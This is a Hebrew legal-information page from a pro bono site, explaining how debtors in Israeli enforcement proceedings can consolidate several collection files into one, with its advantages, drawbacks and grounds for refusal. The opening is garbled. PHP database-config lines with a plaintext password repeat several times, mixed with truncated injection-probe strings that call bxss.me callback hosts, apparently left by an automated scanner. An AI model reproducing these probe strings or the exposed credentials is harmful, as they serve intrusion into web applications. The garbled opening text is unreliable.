$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> איחוד תיקים - עורך דין הוצאה לפועל פרובונו לשירותך
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

איחוד תיקים בהליכי הוצאה לפועל - למי זה מתאים והאם כדאי?

תאריך: 27/04/2011 12:56   מחבר: מערכת פרובונו

בנסיבות בהן מתנהלים בהוצאה לפועל מספר תיקים נגד חייב אחד, מאפשר חוק ההוצאה לפועל, התשכ"ז - 1967 נקיטה בפרוצדורה של איחוד תיקים לתיק אחד המכונה "תיק איחוד".

את הבקשה לאיחוד תיקים יש להגיש בלשכת ההוצאה לפועל שבה מתנהלים מרבית התיקים כנגד החייב.

בדרך כלל יורשה החייב להגיש בקשה לאיחוד תיקים פעם אחת ובמידה ויחול שינוי בנסיבות ייתכן ויותר לו להגיש בקשה שכזו פעם נוספת.

במקרה של איחוד תיקי החייב יהיה על החייב לשלם 3% מסך חובותיו בכלל התיקים המתנהלים נגדו, עד למתן ההחלטה בתיק האיחוד.

יש לציין, שבמידה והבקשה לאיחוד תיקים מתקבלת נשללת מהחייב האפשרות להעדיף נושה אחד על פני נושה אחר, כפי שהיא מתקיימת בשעה שנגד החייב מתנהלים מספר תיקים.

לצורך הגשת בקשה לאיחוד תיקים מומלץ לפנות לקבלת ייעוץ משפטי מקצועי מטעם עורך דין מומחה בתחום, וזאת על מנת להתכונן באופן המיטבי לקראת חקירת היכולת הנערכת בפני רשם ההוצאה לפועל.

זאת משום שבמידה והרשם יגיע למסקנה כי הסיכוי שהחייב יצליח להסדיר את תשלום החובות במסגרת איחוד התיקים הוא נמוך, סביר להניח שלא יורה על מתן צו איחוד תיקים לחייב.

היתרונות בהגשת בקשה לאיחוד תיקים

איחוד תיקים עשוי להקל על אופן ההתמודדות של החייב מול מערכת הגבייה וההוצאה לפועל ולחסוך עבורו זמן מיותר שהיה מכלה על עריכת חקירות יכולת חוזרות בלשכות ההוצאה לפועל השונות.

מספר הבקשות שיש להגיש לאיחוד תיקים הוא כמספר התיקים הפתוחים כנגד החייב.

בהגשת הבקשה והעותקים יש לצרף תצהיר בו מפורטים כלל נכסי החייב במהלך חמש השנים שקדמו להגשת הבקשה, בנוסף לפירוט חובות החייב לרבות חובות שטרם נפתח בגינם תיק בהוצאה לפועל.

החסרונות בהגשת בקשה לאיחוד תיקים

החסרונות בהגשת בקשה מסוג זה הינם שרשם ההוצאה לפועל מוסמך להוציא צו עיכוב יציאה מהארץ כנגד החייב. במקביל, הרשם רשאי לזמן את החייב לחקירת יכולת ולהטיל עיקול על כלל נכסי החייב המפורטים במסגרת הבקשה לאיחוד תיקים וכן להורות על הפקדת ערובה.

מתי לא יינתן צו לאיחוד תיקים על ידי רשם ההוצאה לפועל?

רשם ההוצאה לפועל מוסמך שלא לתת צו לאיחוד תיקים כאשר מתברר כי החייב לא דיווח במסגרת הבקשה לאיחוד תיקים על תיקים נוספים שנפתחו נגדו או שהוא העלים מידע אודות ההכנסות שלו, מצבו הכלכלי או מצא לנכון לשלם מכספו על הוצאה שאינה הכרחית לדעת רשם ההוצאה לפועל.

הליך איחוד תיקים אף אינו מיועד לחייב שייתכן כי יוכרז על ידי רשם ההוצאה לפועל כחייב מוגבל באמצעים.

על חשיבות קבלת סיוע משפטי פרו בונו בנושא איחוד תיקים

הליכי הוצאה לפועל אינם הליכים פשוטים והם דורשים הכנה מוקדמת על ידי אנשי מקצוע מנוסים בתחום.

טרם פתיחה בהליכים מסוג זה ולאורך ניהולם, חשוב לפנות לקבלת ייעוץ משפטי מטעם עורכי דין הוצאה לפועל.

באתר זה תוכלו לנתב את פנייתכם ללא תמורה לטיפולם של עורכי דין מומחים בתחום.

לחצו כאן למילוי פרטיכם בטופס יצירת הקשר באתר ותוכלו לקבל ייעוץ משפטי חינם!

לחצו לקריאת מאמרים נוספים בנושאים:

מחיקת רישום פלילי

פיצויים במקרה של תאונת עבודה

רשלנות רפואית בלידה - כל שחשוב לדעת

ליחצו כאן להוספת תגובה
סגורסגור